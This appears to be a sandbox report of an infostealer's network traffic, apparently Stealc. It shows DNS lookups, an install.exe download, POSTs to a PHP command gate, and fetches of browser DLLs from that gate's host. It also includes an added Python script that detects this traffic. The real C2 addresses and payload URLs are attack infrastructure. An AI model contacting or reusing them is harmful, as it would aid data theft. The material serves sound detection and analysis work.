                                                                                                                                                                                                                                                                  156.59.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  156.59.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.53.146
                                                                                                                                                                                                                                                                  plaintediousidowsko.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.213.139
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.183.72
                                                                                                                                                                                                                                                                  holicisticscrarws.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.40.92
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  47.151.221.77.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  47.151.221.77.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  78.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  78.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.62.251
                                                                                                                                                                                                                                                                  lineagelasserytailsd.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.141.60
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  s3-1-w.amazonaws.com
                                                                                                                                                                                                                                                                  s3-1-w.amazonaws.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.216.137.116
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  16.182.74.217
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.217.131.1
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  54.231.204.145
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  16.182.64.225
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  3.5.29.79
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.217.126.153
                                                                                                                                                                                                                                                                  s3-w.us-east-1.amazonaws.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.217.235.185
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  s3-1-w amazonawscom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  123.48.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  123.48.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.68.92.92
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  prod.nexusrules.live.com.akadns.net
                                                                                                                                                                                                                                                                  prod.nexusrules.live.com.akadns.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  52.111.243.30
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.90.14
                                                                                                                                                                                                                                                                  realdeepai.org
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.193.79
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  89.169.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  89.169.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  59.9.26.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  59.9.26.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.157.87.45
• DNS  miniaturefinerninewjs.shop  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  miniaturefinerninewjs.shop IN A
  Response: 172.67.173.139, 104.21.30.191
• DNS  201.44.21.104.in-addr.arpa  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  201.44.21.104.in-addr.arpa IN PTR
  Response: (none recorded)
• DNS  67.65.42.5.in-addr.arpa  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  67.65.42.5.in-addr.arpa IN PTR
  Response: (none recorded)
• DNS  86.229.13.49.in-addr.arpa  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  86.229.13.49.in-addr.arpa IN PTR
  Response: static.86.229.13.49.clients.your-server.de
• DNS  sofaprivateawarderysj.shop  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  sofaprivateawarderysj.shop IN A
  Response: 172.67.169.40, 104.21.95.16
• DNS  bitbucket.org  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  bitbucket.org IN A
  Response: 104.192.141.1
• DNS  127.85.21.104.in-addr.arpa  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  127.85.21.104.in-addr.arpa IN PTR
  Response: (none recorded)
• DNS  prideconstituiiosjk.shop  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  prideconstituiiosjk.shop IN A
  Response: 104.21.92.157, 172.67.195.106
• DNS  92.92.68.104.in-addr.arpa  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  92.92.68.104.in-addr.arpa IN PTR
  Response: a104-68-92-92.deploy.static.akamaitechnologies.com
• DNS  30.243.111.52.in-addr.arpa  (RegAsm.exe, remote address 8.8.8.8:53 [US])
  Request:  30.243.111.52.in-addr.arpa IN PTR
  Response: (none recorded)
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  185.18.245.58
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  84.252.15.104
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  130.204.29.121
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  200.45.93.45
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  189.61.54.32
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  102.189.33.84
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  95.158.162.200
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  187.225.176.41
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  125.7.253.10
                                                                                                                                                                                                                                                                  1xst.ru
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  211.168.53.110
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  59.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  59.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.26.9.59
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.75.163
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.26.8.59
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  150.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  150.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://77.221.151.47/install.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  77.221.151.47:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /install.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 77.221.151.47
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:35 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 4448942
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 02 May 2024 13:52:07 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "66339a87-43e2ae"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://49.13.229.86/c73eed764cc59dcb.php
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /c73eed764cc59dcb.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII
    Host: 49.13.229.86
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:45 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 156
    Connection: keep-alive
    Vary: Accept-Encoding
• flag-de
  POST http://49.13.229.86/c73eed764cc59dcb.php
  RegAsm.exe
  Remote address: 49.13.229.86:80
  Request
    POST /c73eed764cc59dcb.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ
    Host: 49.13.229.86
    Content-Length: 268
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:45 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 1520
    Connection: keep-alive
    Vary: Accept-Encoding
• flag-de
  POST http://49.13.229.86/c73eed764cc59dcb.php
  RegAsm.exe
  Remote address: 49.13.229.86:80
  Request
    POST /c73eed764cc59dcb.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIEC
    Host: 49.13.229.86
    Content-Length: 267
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:45 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 5416
    Connection: keep-alive
    Vary: Accept-Encoding
• flag-de
  POST http://49.13.229.86/c73eed764cc59dcb.php
  RegAsm.exe
  Remote address: 49.13.229.86:80
  Request
    POST /c73eed764cc59dcb.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE
    Host: 49.13.229.86
    Content-Length: 4923
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:45 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
• flag-de
  GET http://49.13.229.86/84bad7132df89fd7/sqlite3.dll
  RegAsm.exe
  Remote address: 49.13.229.86:80
  Request
    GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1
    Host: 49.13.229.86
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:46 GMT
    Content-Type: application/x-msdos-program
    Content-Length: 1106998
    Connection: keep-alive
    Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
    ETag: "10e436-5e7ec6832a180"
    Accept-Ranges: bytes
• flag-de
  POST http://49.13.229.86/c73eed764cc59dcb.php
  RegAsm.exe
  Remote address: 49.13.229.86:80
  Request
    POST /c73eed764cc59dcb.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI
    Host: 49.13.229.86
    Content-Length: 359
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 11 May 2024 22:38:46 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
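Added detection example (not part of the sandbox report, nor Stealc's own code): the script below scores captured HTTP requests against the traits visible in the RegAsm.exe entries above, namely a multipart POST to a .php gate named with 16 hex characters, a boundary of exactly 20 letters drawn only from A to K (every boundary in this capture has that shape), no User-Agent header, and a later GET of sqlite3.dll from the same host. The sample input is transcribed from the entries above plus one constructed benign upload for contrast; the list of .NET host binaries treated as unexpected network originators is an assumption and can be tuned.

```python
"""Flag Stealc-style C2 traffic in a list of captured HTTP requests."""
import re
from dataclasses import dataclass

# Boundary shape seen in this capture: "----" followed by exactly 20 uppercase letters.
BOUNDARY_RE = re.compile(r"boundary=----([A-Z]{20})$")
# Gate path shape seen in this capture, e.g. /c73eed764cc59dcb.php
GATE_RE = re.compile(r"^/[0-9a-f]{16}\.php$")
# Helper DLL fetch seen in this capture, e.g. /84bad7132df89fd7/sqlite3.dll
DLL_RE = re.compile(r"^/[0-9a-f]{16}/sqlite3\.dll$")
# Assumption: .NET utilities that have no business originating HTTP traffic;
# RegAsm.exe is the one observed above, the others are common hollowing targets.
SUSPICIOUS_PROCESSES = {"regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}


@dataclass
class HttpRequest:
    process: str
    method: str
    host: str
    path: str
    headers: dict  # header name -> value, as captured


def boundary_suspicious(content_type: str) -> bool:
    """True if the multipart boundary is 20 letters all within A..K."""
    m = BOUNDARY_RE.search(content_type or "")
    return bool(m) and set(m.group(1)) <= set("ABCDEFGHIJK")


def score_request(req: HttpRequest) -> list:
    """Return the list of Stealc-like traits a single request exhibits."""
    reasons = []
    if req.method == "POST" and GATE_RE.match(req.path):
        reasons.append("POST to 16-hex .php gate")
    ct = req.headers.get("Content-Type", "")
    if ct.startswith("multipart/form-data") and boundary_suspicious(ct):
        reasons.append("20-letter A-K multipart boundary")
    if "User-Agent" not in req.headers:
        reasons.append("no User-Agent header")
    if req.method == "GET" and DLL_RE.match(req.path):
        reasons.append("fetches sqlite3.dll from 16-hex directory")
    if req.process.lower() in SUSPICIOUS_PROCESSES:
        reasons.append(f"network activity from {req.process}")
    return reasons


def correlate(requests, min_reasons: int = 3):
    """Return ([(index, reasons)], [hosts]) where hosts both received gate POSTs
    and served sqlite3.dll, the sequence seen in this capture."""
    hits, gate_hosts, dll_hosts = [], set(), set()
    for i, r in enumerate(requests):
        reasons = score_request(r)
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
        if any(x.startswith("POST to") for x in reasons):
            gate_hosts.add(r.host)
        if any(x.startswith("fetches") for x in reasons):
            dll_hosts.add(r.host)
    return hits, sorted(gate_hosts & dll_hosts)


# Constructed sample: three requests transcribed from the entries above and one
# constructed benign browser upload (example.com, WebKit boundary, User-Agent set).
SAMPLE = [
    HttpRequest("RegAsm.exe", "POST", "49.13.229.86", "/c73eed764cc59dcb.php",
                {"Content-Type": "multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ",
                 "Host": "49.13.229.86", "Content-Length": "268",
                 "Connection": "Keep-Alive", "Cache-Control": "no-cache"}),
    HttpRequest("RegAsm.exe", "POST", "49.13.229.86", "/c73eed764cc59dcb.php",
                {"Content-Type": "multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE",
                 "Host": "49.13.229.86", "Content-Length": "4923",
                 "Connection": "Keep-Alive", "Cache-Control": "no-cache"}),
    HttpRequest("RegAsm.exe", "GET", "49.13.229.86", "/84bad7132df89fd7/sqlite3.dll",
                {"Host": "49.13.229.86", "Cache-Control": "no-cache"}),
    HttpRequest("chrome.exe", "POST", "example.com", "/upload.php",
                {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
                 "Host": "example.com", "User-Agent": "Mozilla/5.0",
                 "Content-Length": "1024"}),
]

if __name__ == "__main__":
    hits, hosts = correlate(SAMPLE)
    for i, reasons in hits:
        print(f"request {i}: {', '.join(reasons)}")
    print("gate hosts that also served sqlite3.dll:", hosts)
```

The per-request score catches each POST and the DLL fetch on its own; the host-level correlation is the stronger signal, since a benign server rarely both accepts anonymous multipart POSTs to a hex-named gate and hands out sqlite3.dll to the same client moments later.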
• flag-de
  POST http://49.13.229.86/c73eed764cc59dcb.php
  RegAsm.exe
  Remote address: 49.13.229.86:80
  Request
    POST /c73eed764cc59dcb.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIE
    Host: 49.13.229.86
    Content-Length: 359
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/freebl3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:47 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/mozglue.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:48 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/msvcp140.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:48 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                  ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-de
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://49.13.229.86/84bad7132df89fd7/nss3.dll
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  49.13.229.86:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /84bad7132df89fd7/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 49.13.229.86
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
